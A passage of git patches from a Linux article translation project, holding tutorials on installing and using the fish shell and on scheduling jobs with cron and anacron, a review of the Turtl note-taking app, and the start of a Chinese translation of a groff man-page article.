/etc/yum.repos.d/ +``` + +``` +wget https://download.opensuse.org/repositories/shells:fish:release:2/RedHat_RHEL-6/shells:fish:release:2.repo +``` + +``` +yum install fish +``` + +On Ubuntu and its derivatives: + +``` +sudo apt-get update +``` + +``` +sudo apt-get install fish +``` + +That’s it. It is time explore fish shell. + +### Usage + +To switch to fish from your default shell, do: + +``` +$ fish +Welcome to fish, the friendly interactive shell +``` + +You can find the default fish configuration at ~/.config/fish/config.fish (similar to .bashrc). If it doesn’t exist, just create it. + +#### Auto suggestions + +When I type a command, it automatically suggests a command in a light grey color. So, I had to type a first few letters of a Linux and hit tab key to complete the command. + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-1.png)][2] + +If there are more possibilities, it will list them. You can select the listed commands from the list by using up/down arrow keys. After choosing the command you want to run, just hit the right arrow key and press ENTER to run it. + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-2.png)][3] + +No more CTRL+r! As you already know, we do reverse search by pressing ctrl+r to search for commands from history in Bash shell. But it is not necessary in fish shell. Since it has autosuggestions capability, just type first few letters of a command, and pick the command from the list that you already executed, from the history. Cool, yeah? + +#### Smart search + +We can also do smart search to find a specific command, file or directory. For example, I type the substring of a command, then hit the down arrow key to enter into smart search and again type a letter to pick the required command from the list. + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-6.png)][4] + +#### Syntax highlighting + +You will notice the syntax highlighting as you type a command. See the difference in below screenshots when I type the same command in Bash and fish shells. + +Bash: + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-3.png)][5] + +Fish: + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-4.png)][6] + +As you see, “sudo” has been highlighted in fish shell. Also, it will display the invalid commands in red color by default. + +#### Web based configuration + +This is yet another cool feature of fish shell. We can can set our colors, change fish prompt, and view functions, variables, history, key bindings all from a web page. + +To start the web configuration interface, just type: + +``` +fish_config +``` + + [![](http://www.ostechnix.com/wp-content/uploads/2017/12/fish-5.png)][7] + +#### Man page completions + +Bash and other shells supports programmable completions, but only fish generates them automatically by parsing your installed man pages. + +To do so, run: + +``` +fish_update_completions +``` + +Sample output would be: + +``` +Parsing man pages and writing completions to /home/sk/.local/share/fish/generated_completions/ + 3435 / 3435 : zramctl.8.gz +``` + +#### Disable greetings + +By default, fish greets you (Welcome to fish, the friendly interactive shell) at startup. If you don’t this greeting message, you can disable it. To do so, edit fish configuration file: + +``` +vi ~/.config/fish/config.fish +``` + +Add the following line: + +``` +set -g -x fish_greeting '' +``` + +Instead of disabling fish greeting, you can also set any custom greeting message. + +``` +set -g -x fish_greeting 'Welcome to OSTechNix' +``` + +#### Getting help + +This one is another impressive feature that caught my attention. To open fish documentation page in your default web browser from Terminal, just type: + +``` +help +``` + +The official documentation will be opened in your default browser. Also, you can use man pages to display the help section of any command. + +``` +man fish +``` + +#### Set Fish as default shell + +Liked it very much? Great! Just set it as default shell. To do so, use chsh command: + +``` +chsh -s /usr/bin/fish +``` + +Here, /usr/bin/fish is the path to the fish shell. If you don’t know the correct path, the following command will help you. + +``` +which fish +``` + +Log out and log in back to use the new default shell. + +Please remember that many shell scripts written for Bash may not fully compatible with fish. + +To switch back to Bash, just run: + +``` +bash +``` + +If you want Bash as your default shell permanently, run: + +``` +chsh -s /bin/bash +``` + +And, that’s all for now folks. At this stage, you might get a basic idea about fish shell usage. If you’re looking for a Bash alternatives, fish might be a good option. + +Cheers! + +Resource: + +* [fish shell website][1] + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/install-fish-friendly-interactive-shell-linux/ + +作者:[SK][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://fishshell.com/ +[2]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-1.png +[3]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-2.png +[4]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-6.png +[5]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-3.png +[6]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-4.png +[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/fish-5.png From 8e4db559459021902bc0235577e6d0fe944245f0 Mon Sep 17 00:00:00 2001 From: darksun Date: Fri, 8 Dec 2017 15:34:33 +0800 Subject: [PATCH 0412/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Getting=20start?= =?UTF-8?q?ed=20with=20Turtl,=20an=20open=20source=20alternative=20to=20Ev?= =?UTF-8?q?ernote?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... an open source alternative to Evernote.md | 95 +++++++++++++++++++ 1 file changed, 95 insertions(+) create mode 100644 sources/tech/20171206 Getting started with Turtl, an open source alternative to Evernote.md diff --git a/sources/tech/20171206 Getting started with Turtl, an open source alternative to Evernote.md b/sources/tech/20171206 Getting started with Turtl, an open source alternative to Evernote.md new file mode 100644 index 0000000000..969ef39901 --- /dev/null +++ b/sources/tech/20171206 Getting started with Turtl, an open source alternative to Evernote.md @@ -0,0 +1,95 @@ +Getting started with Turtl, an open source alternative to Evernote +====== +![Using Turtl as an open source alternative to Evernote](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUS_brainstorm_island_520px.png?itok=6IUPyxkY) + +Just about everyone I know takes notes, and many people use an online note-taking application like Evernote, Simplenote, or Google Keep. Those are all good tools, but you have to wonder about the security and privacy of your information—especially in light of [Evernote's privacy flip-flop of 2016][1]. If you want more control over your notes and your data, you really need to turn to an open source tool. + +Whatever your reasons for moving away from Evernote, there are open source alternatives out there. Let's look at one of those alternatives: Turtl. + +### Getting started + +The developers behind [Turtl][2] want you to think of it as "Evernote with ultimate privacy." To be honest, I can't vouch for the level of privacy that Turtl offers, but it is a quite a good note-taking tool. + +To get started with Turtl, [download][3] a desktop client for Linux, Mac OS, or Windows, or grab the [Android app][4]. Install it, then fire up the client or app. You'll be asked for a username and passphrase. Turtl uses the passphrase to generate a cryptographic key that, according to the developers, encrypts your notes before storing them anywhere on your device or on their servers. + +### Using Turtl + +You can create the following types of notes with Turtl: + +* Password + +* File + +* Image + +* Bookmark + +* Text note + +No matter what type of note you choose, you create it in a window that's similar for all types of notes: + +### [turtl-new-note-520.png][5] + +![Create new text note with Turtl](https://opensource.com/sites/default/files/images/life-uploads/turtl-new-note-520.png) + +Creating a new text note in Turtl + +Add information like the title of the note, some text, and (if you're creating a File or Image note) attach a file or an image. Then click Save. + +You can add formatting to your notes via [Markdown][6]. You need to add the formatting by hand—there are no toolbar shortcuts. + +If you need to organize your notes, you can add them to Boards. Boards are just like notebooks in Evernote. To create a new board, click on the Boards tab, then click the Create a board button. Type a title for the board, then click Create. + +### [turtl-boards-520.png][7] + +![Create new board in Turtl](https://opensource.com/sites/default/files/images/life-uploads/turtl-boards-520.png) + +Creating a new board in Turtl + +To add a note to a board, create or edit the note, then click the This note is not in any boards link at the bottom of the note. Select one or more boards, then click Done. + +To add tags to a note, click the Tags icon at the bottom of a note, enter one or more keywords separated by commas, and click Done. + +### Syncing your notes across your devices + +If you use Turtl across several computers and an Android device, for example, Turtl will sync your notes whenever you're online. However, I've encountered a small problem with syncing: Every so often, a note I've created on my phone doesn't sync to my laptop. I tried to sync manually by clicking the icon in the top left of the window and then clicking Sync Now, but that doesn't always work. I found that I occasionally need to click that icon, click Your settings, and then click Clear local data. I then need to log back into Turtl, but all the data syncs properly. + +### A question, and a couple of problems + +When I started using Turtl, I was dogged by one question: Where are my notes kept online? It turns out that the developers behind Turtl are based in the U.S., and that's also where their servers are. Although the encryption that Turtl uses is [quite strong][8] and your notes are encrypted on the server, the paranoid part of me says that you shouldn't save anything sensitive in Turtl (or any online note-taking tool, for that matter). + +Turtl displays notes in a tiled view, reminiscent of Google Keep: + +### [turtl-notes-520.png][9] + +![Notes in Turtl](https://opensource.com/sites/default/files/images/life-uploads/turtl-notes-520.png) + +A collection of notes in Turtl + +There's no way to change that to a list view, either on the desktop or on the Android app. This isn't a problem for me, but I've heard some people pan Turtl because it lacks a list view. + +Speaking of the Android app, it's not bad; however, it doesn't integrate with the Android Share menu. If you want to add a note to Turtl based on something you've seen or read in another app, you need to copy and paste it manually. + +I've been using a Turtl for several months on a Linux-powered laptop, my [Chromebook running GalliumOS][10], and an Android-powered phone. It's been a pretty seamless experience across all those devices. Although it's not my favorite open source note-taking tool, Turtl does a pretty good job. Give it a try; it might be the simple note-taking tool you're looking for. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/using-turtl-open-source-alternative-evernote + +作者:[Scott Nesbitt][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/scottnesbitt +[1]:https://blog.evernote.com/blog/2016/12/15/evernote-revisits-privacy-policy/ +[2]:https://turtlapp.com/ +[3]:https://turtlapp.com/download/ +[4]:https://turtlapp.com/download/ +[5]:https://opensource.com/file/378346 +[6]:https://en.wikipedia.org/wiki/Markdown +[7]:https://opensource.com/file/378351 +[8]:https://turtlapp.com/docs/security/encryption-specifics/ +[9]:https://opensource.com/file/378356 +[10]:https://opensource.com/article/17/4/linux-chromebook-gallium-os From 0998b98904c5adcf7416eeccf05817640d689f2a Mon Sep 17 00:00:00 2001 From: kimii <2545489745@qq.com> Date: Fri, 8 Dec 2017 16:42:38 +0800 Subject: [PATCH 0413/1627] Update 20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md Translating by kimii --- ... To Install Fish, The Friendly Interactive Shell, In Linux.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md b/sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md index eaecb18a0a..00a5ebadef 100644 --- a/sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md +++ b/sources/tech/20171206 How To Install Fish, The Friendly Interactive Shell, In Linux.md @@ -1,3 +1,4 @@ +Translating by kimii How To Install Fish, The Friendly Interactive Shell, In Linux ====== Fish, acronym of friendly interactive shell, is a well equipped, smart and user-friendly shell for Unix-like systems. Fish comes with many significant features, such as autosuggestions, syntax highlighting, searchable history (like CTRL+r in Bash), smart search functionality, glorious VGA color support, web based configuration, man page completions and many, out of the box. Just install it and start using it in no time. No more extra configuration or you don’t have to install any extra add-ons/plug-ins! From 6761ed9cdbdb129b3fd6c733f6bdd17e64cecdd3 Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 8 Dec 2017 17:18:54 +0800 Subject: [PATCH 0414/1627] =?UTF-8?q?=E5=88=A0=E9=99=A4=E9=87=8D=E5=A4=8D?= =?UTF-8?q?=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @yongshouzhang ,不好意思, 这篇已经被翻译发布过了: https://linux.cn/article-9057-1.html ,所以这个文章不用浪费精力了。 @oska874 --- .../20171207 How to use cron in Linux.md | 288 ------------------ 1 file changed, 288 deletions(-) delete mode 100644 sources/tech/20171207 How to use cron in Linux.md diff --git a/sources/tech/20171207 How to use cron in Linux.md b/sources/tech/20171207 How to use cron in Linux.md deleted file mode 100644 index 3165aa8139..0000000000 --- a/sources/tech/20171207 How to use cron in Linux.md +++ /dev/null @@ -1,288 +0,0 @@ -translating by yongshouzhang - -How to use cron in Linux -============================================================ - -### No time for commands? Scheduling tasks with cron means programs can run but you don't have to stay up late. - - [![](https://opensource.com/sites/default/files/styles/byline_thumbnail/public/david-crop.jpg?itok=Wnz6HdS0)][10] 06 Nov 2017 [David Both][11] [Feed][12] - -27[up][13] - - [9 comments][14] -![How to use cron in Linux](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/linux-penguins.png?itok=yKOpaJM_) - -Image by : - -[Internet Archive Book Images][15]. Modified by Opensource.com. [CC BY-SA 4.0][16] - -One of the challenges (among the many advantages) of being a sysadmin is running tasks when you'd rather be sleeping. For example, some tasks (including regularly recurring tasks) need to run overnight or on weekends, when no one is expected to be using computer resources. I have no time to spare in the evenings to run commands and scripts that have to operate during off-hours. And I don't want to have to get up at oh-dark-hundred to start a backup or major update. - -Instead, I use two service utilities that allow me to run commands, programs, and tasks at predetermined times. The [cron][17] and at services enable sysadmins to schedule tasks to run at a specific time in the future. The at service specifies a one-time task that runs at a certain time. The cron service can schedule tasks on a repetitive basis, such as daily, weekly, or monthly. - -In this article, I'll introduce the cron service and how to use it. - -### Common (and uncommon) cron uses - -I use the cron service to schedule obvious things, such as regular backups that occur daily at 2 a.m. I also use it for less obvious things. - -* The system times (i.e., the operating system time) on my many computers are set using the Network Time Protocol (NTP). While NTP sets the system time, it does not set the hardware time, which can drift. I use cron to set the hardware time based on the system time. - -* I also have a Bash program I run early every morning that creates a new "message of the day" (MOTD) on each computer. It contains information, such as disk usage, that should be current in order to be useful. - -* Many system processes and services, like [Logwatch][1], [logrotate][2], and [Rootkit Hunter][3], use the cron service to schedule tasks and run programs every day. - -The crond daemon is the background service that enables cron functionality. - -The cron service checks for files in the /var/spool/cron and /etc/cron.d directories and the /etc/anacrontab file. The contents of these files define cron jobs that are to be run at various intervals. The individual user cron files are located in /var/spool/cron, and system services and applications generally add cron job files in the /etc/cron.ddirectory. The /etc/anacrontab is a special case that will be covered later in this article. - -### Using crontab - -The cron utility runs based on commands specified in a cron table (crontab). Each user, including root, can have a cron file. These files don't exist by default, but can be created in the /var/spool/cron directory using the crontab -e command that's also used to edit a cron file (see the script below). I strongly recommend that you not use a standard editor (such as Vi, Vim, Emacs, Nano, or any of the many other editors that are available). Using the crontab command not only allows you to edit the command, it also restarts the crond daemon when you save and exit the editor. The crontabcommand uses Vi as its underlying editor, because Vi is always present (on even the most basic of installations). - -New cron files are empty, so commands must be added from scratch. I added the job definition example below to my own cron files, just as a quick reference, so I know what the various parts of a command mean. Feel free to copy it for your own use. - -``` -# crontab -e -SHELL=/bin/bash -MAILTO=root@example.com -PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin - -# For details see man 4 crontabs - -# Example of job definition: -# .---------------- minute (0 - 59) -# | .------------- hour (0 - 23) -# | | .---------- day of month (1 - 31) -# | | | .------- month (1 - 12) OR jan,feb,mar,apr ... -# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat -# | | | | | -# * * * * * user-name command to be executed - -# backup using the rsbu program to the internal 4TB HDD and then 4TB external -01 01 * * * /usr/local/bin/rsbu -vbd1 ; /usr/local/bin/rsbu -vbd2 - -# Set the hardware clock to keep it in sync with the more accurate system clock -03 05 * * * /sbin/hwclock --systohc - -# Perform monthly updates on the first of the month -# 25 04 1 * * /usr/bin/dnf -y update -``` - -The first three lines in the code above set up a default environment. The environment must be set to whatever is necessary for a given user because cron does not provide an environment of any kind. The SHELL variable specifies the shell to use when commands are executed. This example specifies the Bash shell. The MAILTO variable sets the email address where cron job results will be sent. These emails can provide the status of the cron job (backups, updates, etc.) and consist of the output you would see if you ran the program manually from the command line. The third line sets up the PATH for the environment. Even though the path is set here, I always prepend the fully qualified path to each executable. - -There are several comment lines in the example above that detail the syntax required to define a cron job. I'll break those commands down, then add a few more to show you some more advanced capabilities of crontab files. - -``` -01 01 * * * /usr/local/bin/rsbu -vbd1 ; /usr/local/bin/rsbu -vbd2 -``` - -This line runs my self-written Bash shell script, rsbu, that backs up all my systems. This job kicks off at 1:01 a.m. (01 01) every day. The asterisks (*) in positions three, four, and five of the time specification are like file globs, or wildcards, for other time divisions; they specify "every day of the month," "every month," and "every day of the week." This line runs my backups twice; one backs up to an internal dedicated backup hard drive, and the other backs up to an external USB drive that I can take to the safe deposit box. - -The following line sets the hardware clock on the computer using the system clock as the source of an accurate time. This line is set to run at 5:03 a.m. (03 05) every day. - -``` -03 05 * * * /sbin/hwclock --systohc -``` - -I was using the third and final cron job (commented out) to perform a dnf or yumupdate at 04:25 a.m. on the first day of each month, but I commented it out so it no longer runs. - -``` -# 25 04 1 * * /usr/bin/dnf -y update -``` - -### Other scheduling tricks - -Now let's do some things that are a little more interesting than these basics. Suppose you want to run a particular job every Thursday at 3 p.m.: - -``` -00 15 * * Thu /usr/local/bin/mycronjob.sh -``` - -Or, maybe you need to run quarterly reports after the end of each quarter. The cron service has no option for "The last day of the month," so instead you can use the first day of the following month, as shown below. (This assumes that the data needed for the reports will be ready when the job is set to run.) - -``` -02 03 1 1,4,7,10 * /usr/local/bin/reports.sh -``` - -The following shows a job that runs one minute past every hour between 9:01 a.m. and 5:01 p.m. - -``` -01 09-17 * * * /usr/local/bin/hourlyreminder.sh -``` - -I have encountered situations where I need to run a job every two, three, or four hours. That can be accomplished by dividing the hours by the desired interval, such as */3 for every three hours, or 6-18/3 to run every three hours between 6 a.m. and 6 p.m. Other intervals can be divided similarly; for example, the expression */15 in the minutes position means "run the job every 15 minutes." - -``` -*/5 08-18/2 * * * /usr/local/bin/mycronjob.sh -``` - -One thing to note: The division expressions must result in a remainder of zero for the job to run. That's why, in this example, the job is set to run every five minutes (08:05, 08:10, 08:15, etc.) during even-numbered hours from 8 a.m. to 6 p.m., but not during any odd-numbered hours. For example, the job will not run at all from 9 p.m. to 9:59 a.m. - -I am sure you can come up with many other possibilities based on these examples. - -### Limiting cron access - -More Linux resources - -* [What is Linux?][4] - -* [What are Linux containers?][5] - -* [Download Now: Linux commands cheat sheet][6] - -* [Advanced Linux commands cheat sheet][7] - -* [Our latest Linux articles][8] - -Regular users with cron access could make mistakes that, for example, might cause system resources (such as memory and CPU time) to be swamped. To prevent possible misuse, the sysadmin can limit user access by creating a - -**/etc/cron.allow** - - file that contains a list of all users with permission to create cron jobs. The root user cannot be prevented from using cron. - -By preventing non-root users from creating their own cron jobs, it may be necessary for root to add their cron jobs to the root crontab. "But wait!" you say. "Doesn't that run those jobs as root?" Not necessarily. In the first example in this article, the username field shown in the comments can be used to specify the user ID a job is to have when it runs. This prevents the specified non-root user's jobs from running as root. The following example shows a job definition that runs a job as the user "student": - -``` -04 07 * * * student /usr/local/bin/mycronjob.sh -``` - -### cron.d - -The directory /etc/cron.d is where some applications, such as [SpamAssassin][18] and [sysstat][19], install cron files. Because there is no spamassassin or sysstat user, these programs need a place to locate cron files, so they are placed in /etc/cron.d. - -The /etc/cron.d/sysstat file below contains cron jobs that relate to system activity reporting (SAR). These cron files have the same format as a user cron file. - -``` -# Run system activity accounting tool every 10 minutes -*/10 * * * * root /usr/lib64/sa/sa1 1 1 -# Generate a daily summary of process accounting at 23:53 -53 23 * * * root /usr/lib64/sa/sa2 -A -``` - -The sysstat cron file has two lines that perform tasks. The first line runs the sa1program every 10 minutes to collect data stored in special binary files in the /var/log/sadirectory. Then, every night at 23:53, the sa2 program runs to create a daily summary. - -### Scheduling tips - -Some of the times I set in the crontab files seem rather random—and to some extent they are. Trying to schedule cron jobs can be challenging, especially as the number of jobs increases. I usually have only a few tasks to schedule on each of my computers, which is simpler than in some of the production and lab environments where I have worked. - -One system I administered had around a dozen cron jobs that ran every night and an additional three or four that ran on weekends or the first of the month. That was a challenge, because if too many jobs ran at the same time—especially the backups and compiles—the system would run out of RAM and nearly fill the swap file, which resulted in system thrashing while performance tanked, so nothing got done. We added more memory and improved how we scheduled tasks. We also removed a task that was very poorly written and used large amounts of memory. - -The crond service assumes that the host computer runs all the time. That means that if the computer is turned off during a period when cron jobs were scheduled to run, they will not run until the next time they are scheduled. This might cause problems if they are critical cron jobs. Fortunately, there is another option for running jobs at regular intervals: anacron. - -### anacron - -The [anacron][20] program performs the same function as crond, but it adds the ability to run jobs that were skipped, such as if the computer was off or otherwise unable to run the job for one or more cycles. This is very useful for laptops and other computers that are turned off or put into sleep mode. - -As soon as the computer is turned on and booted, anacron checks to see whether configured jobs missed their last scheduled run. If they have, those jobs run immediately, but only once (no matter how many cycles have been missed). For example, if a weekly job was not run for three weeks because the system was shut down while you were on vacation, it would be run soon after you turn the computer on, but only once, not three times. - -The anacron program provides some easy options for running regularly scheduled tasks. Just install your scripts in the /etc/cron.[hourly|daily|weekly|monthly]directories, depending how frequently they need to be run. - -How does this work? The sequence is simpler than it first appears. - -1. The crond service runs the cron job specified in /etc/cron.d/0hourly. - -``` -# Run the hourly jobs -SHELL=/bin/bash -PATH=/sbin:/bin:/usr/sbin:/usr/bin -MAILTO=root -01 * * * * root run-parts /etc/cron.hourly -``` - -1. The cron job specified in /etc/cron.d/0hourly runs the run-parts program once per hour. - -2. The run-parts program runs all the scripts located in the /etc/cron.hourlydirectory. - -3. The /etc/cron.hourly directory contains the 0anacron script, which runs the anacron program using the /etdc/anacrontab configuration file shown here. - -``` -# /etc/anacrontab: configuration file for anacron - -# See anacron(8) and anacrontab(5) for details. - -SHELL=/bin/sh -PATH=/sbin:/bin:/usr/sbin:/usr/bin -MAILTO=root -# the maximal random delay added to the base delay of the jobs -RANDOM_DELAY=45 -# the jobs will be started during the following hours only -START_HOURS_RANGE=3-22 - -#period in days delay in minutes job-identifier command -1 5 cron.daily nice run-parts /etc/cron.daily -7 25 cron.weekly nice run-parts /etc/cron.weekly -@monthly 45 cron.monthly nice run-parts /etc/cron.monthly -``` - -1. The anacron program runs the programs located in /etc/cron.daily once per day; it runs the jobs located in /etc/cron.weekly once per week, and the jobs in cron.monthly once per month. Note the specified delay times in each line that help prevent these jobs from overlapping themselves and other cron jobs. - -Instead of placing complete Bash programs in the cron.X directories, I install them in the /usr/local/bin directory, which allows me to run them easily from the command line. Then I add a symlink in the appropriate cron directory, such as /etc/cron.daily. - -The anacron program is not designed to run programs at specific times. Rather, it is intended to run programs at intervals that begin at the specified times, such as 3 a.m. (see the START_HOURS_RANGE line in the script just above) of each day, on Sunday (to begin the week), and on the first day of the month. If any one or more cycles are missed, anacron will run the missed jobs once, as soon as possible. - -### More on setting limits - -I use most of these methods for scheduling tasks to run on my computers. All those tasks are ones that need to run with root privileges. It's rare in my experience that regular users really need a cron job. One case was a developer user who needed a cron job to kick off a daily compile in a development lab. - -It is important to restrict access to cron functions by non-root users. However, there are circumstances when a user needs to set a task to run at pre-specified times, and cron can allow them to do that. Many users do not understand how to properly configure these tasks using cron and they make mistakes. Those mistakes may be harmless, but, more often than not, they can cause problems. By setting functional policies that cause users to interact with the sysadmin, individual cron jobs are much less likely to interfere with other users and other system functions. - -It is possible to set limits on the total resources that can be allocated to individual users or groups, but that is an article for another time. - -For more information, the man pages for [cron][21], [crontab][22], [anacron][23], [anacrontab][24], and [run-parts][25] all have excellent information and descriptions of how the cron system works. - -### Topics - - [Linux][26][SysAdmin][27] - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][28] David Both - -- - - David Both is a Linux and Open Source advocate who resides in Raleigh, North Carolina. He has been in the IT industry for over forty years and taught OS/2 for IBM where he worked for over 20 years. While at IBM, he wrote the first training course for the original IBM PC in 1981\. He has taught RHCE classes for Red Hat and has worked at MCI Worldcom, Cisco, and the State of North Carolina. He has been working with Linux and Open Source Software for almost 20 years. David has written articles for... [more about David Both][29][More about me][30] - -* [Learn how you can contribute][9] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/how-use-cron-linux - -作者:[David Both ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]: -[1]:https://sourceforge.net/projects/logwatch/files/ -[2]:https://github.com/logrotate/logrotate -[3]:http://rkhunter.sourceforge.net/ -[4]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[5]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[6]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[7]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[8]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[9]:https://opensource.com/participate -[10]:https://opensource.com/users/dboth -[11]:https://opensource.com/users/dboth -[12]:https://opensource.com/user/14106/feed -[13]:https://opensource.com/article/17/11/how-use-cron-linux?rate=9R7lrdQXsne44wxIh0Wu91ytYaxxi86zT1-uHo1a1IU -[14]:https://opensource.com/article/17/11/how-use-cron-linux#comments -[15]:https://www.flickr.com/photos/internetarchivebookimages/20570945848/in/photolist-xkMtw9-xA5zGL-tEQLWZ-wFwzFM-aNwxgn-aFdWBj-uyFKYv-7ZCCBU-obY1yX-UAPafA-otBzDF-ovdDo6-7doxUH-obYkeH-9XbHKV-8Zk4qi-apz7Ky-apz8Qu-8ZoaWG-orziEy-aNwxC6-od8NTv-apwpMr-8Zk4vn-UAP9Sb-otVa3R-apz6Cb-9EMPj6-eKfyEL-cv5mwu-otTtHk-7YjK1J-ovhxf6-otCg2K-8ZoaJf-UAPakL-8Zo8j7-8Zk74v-otp4Ls-8Zo8h7-i7xvpR-otSosT-9EMPja-8Zk6Zi-XHpSDB-hLkuF3-of24Gf-ouN1Gv-fJzkJS-icfbY9 -[16]:https://creativecommons.org/licenses/by-sa/4.0/ -[17]:https://en.wikipedia.org/wiki/Cron -[18]:http://spamassassin.apache.org/ -[19]:https://github.com/sysstat/sysstat -[20]:https://en.wikipedia.org/wiki/Anacron -[21]:http://man7.org/linux/man-pages/man8/cron.8.html -[22]:http://man7.org/linux/man-pages/man5/crontab.5.html -[23]:http://man7.org/linux/man-pages/man8/anacron.8.html -[24]:http://man7.org/linux/man-pages/man5/anacrontab.5.html -[25]:http://manpages.ubuntu.com/manpages/zesty/man8/run-parts.8.html -[26]:https://opensource.com/tags/linux -[27]:https://opensource.com/tags/sysadmin -[28]:https://opensource.com/users/dboth -[29]:https://opensource.com/users/dboth -[30]:https://opensource.com/users/dboth From 99a80e03726706115d85a31a7c0e71c0931fe6dd Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 8 Dec 2017 18:06:54 +0800 Subject: [PATCH 0415/1627] PRF:19951001 Writing man Pages Using groff.md @wxy --- .../19951001 Writing man Pages Using groff.md | 106 +++++++++++------- 1 file changed, 64 insertions(+), 42 deletions(-) diff --git a/sources/tech/19951001 Writing man Pages Using groff.md b/sources/tech/19951001 Writing man Pages Using groff.md index 3aad365c56..896c6ebe48 100644 --- a/sources/tech/19951001 Writing man Pages Using groff.md +++ b/sources/tech/19951001 Writing man Pages Using groff.md @@ -1,54 +1,53 @@ -translating by wxy -Writing man Pages Using groff +使用 groff 编写 man 手册页页 =================== -groff is the GNU version of the popular nroff/troff text-formatting tools provided on most Unix systems. Its most common use is writing manual pages—online documentation for commands, programming interfaqces, and so forth. In this article, we show you the ropes of writing your own man pages with groff. +`groff` 是大多数 Unix 系统上所提供的流行的文本格式化工具 nroff/troff 的 GNU 版本。它一般用于编写手册页,即命令、编程接口等的在线文档。在本文中,我们将给你展示如何使用 `groff` 编写你自己的 man 手册页。 -Two of the original text processing systems found on Unix systems are troff and nroff, developed at Bell Labs for the original implementation of Unix (in fact, the development of Unix itself was spurred, in part, to support such a text-processing system). The first version of this text processor was called roff (for “runoff”); later came troff, which generated output for a particular typesetter in use at the time. nroff was a later version that became the standard text processor on Unix systems everywhere. groff is GNU's implementation of nroff and troff that is used on Linux systems. It includes several extended features and drivers for a number of printing devices. +在 Unix 系统上最初有两个文本处理系统:troff 和 nroff,它们是由贝尔实验室为初始的 Unix 所开发的(事实上,开发 Unix 系统的部分原因就是为了支持这样的一个文本处理系统)。这个文本处理器的第一个版本被称作 roff(意为 “runoff”——径流);稍后出现了 troff,在那时用于为特定的排字机Typesetter生成输出。nroff 是更晚一些的版本,它成为了各种 Unix 系统的标准文本处理器。groff 是 nroff 和 troff 的 GNU 实现,用在 Linux 系统上。它包括了几个扩展功能和一些打印设备的驱动程序。 -groff is capable of producing documents, articles, and books, much in the same vein as other text-formatting systems, such as TeX. However, groff (as well as the original nroff) has one intrinsic feature that is absent from TeX and variants: the ability to produce plain-ASCII output. While other systems are great for producing documents to be printed, groff is able to produce plain ASCII to be viewed online (or printed directly as plain text on even the simplest of printers). If you're going to be producing documentation to be viewed online, as well as in printed form, groff may be the way to go (although there are alternatives, such as Texinfo, Lametex, and other tools). +`groff` 能够生成文档、文章和书籍,很多时候它就像是其它的文本格式化系统(如 TeX)的血管一样。然而,`groff`(以及原来的 nroff)有一个固有的功能是 TeX 及其变体所缺乏的:生成普通 ASCII 输出。其它的系统在生成打印的文档方面做得很好,而 `groff` 却能够生成可以在线浏览的普通 ASCII(甚至可以在最简单的打印机上直接以普通文本打印)。如果要生成在线浏览的文档以及打印的表单,`groff` 也许是你所需要的(虽然也有替代品,如 Texinfo、Lametex 等等)。 -groff also has the benefit of being much smaller than TeX; it requires fewer support files and executables than even a minimal TeX distribution. +`groff` 还有一个好处是它比 TeX 小很多;它所需要的支持文件和可执行程序甚至比最小化的 TeX 版本都少。 -One special application of groff is to format Unix man pages. If you're a Unix programmer, you'll eventually need to write and produce man pages of some kind. In this article, we'll introduce the use of groff through the writing of a short man page. +`groff` 一个特定的用途是用于格式化 Unix 的 man 手册页。如果你是一个 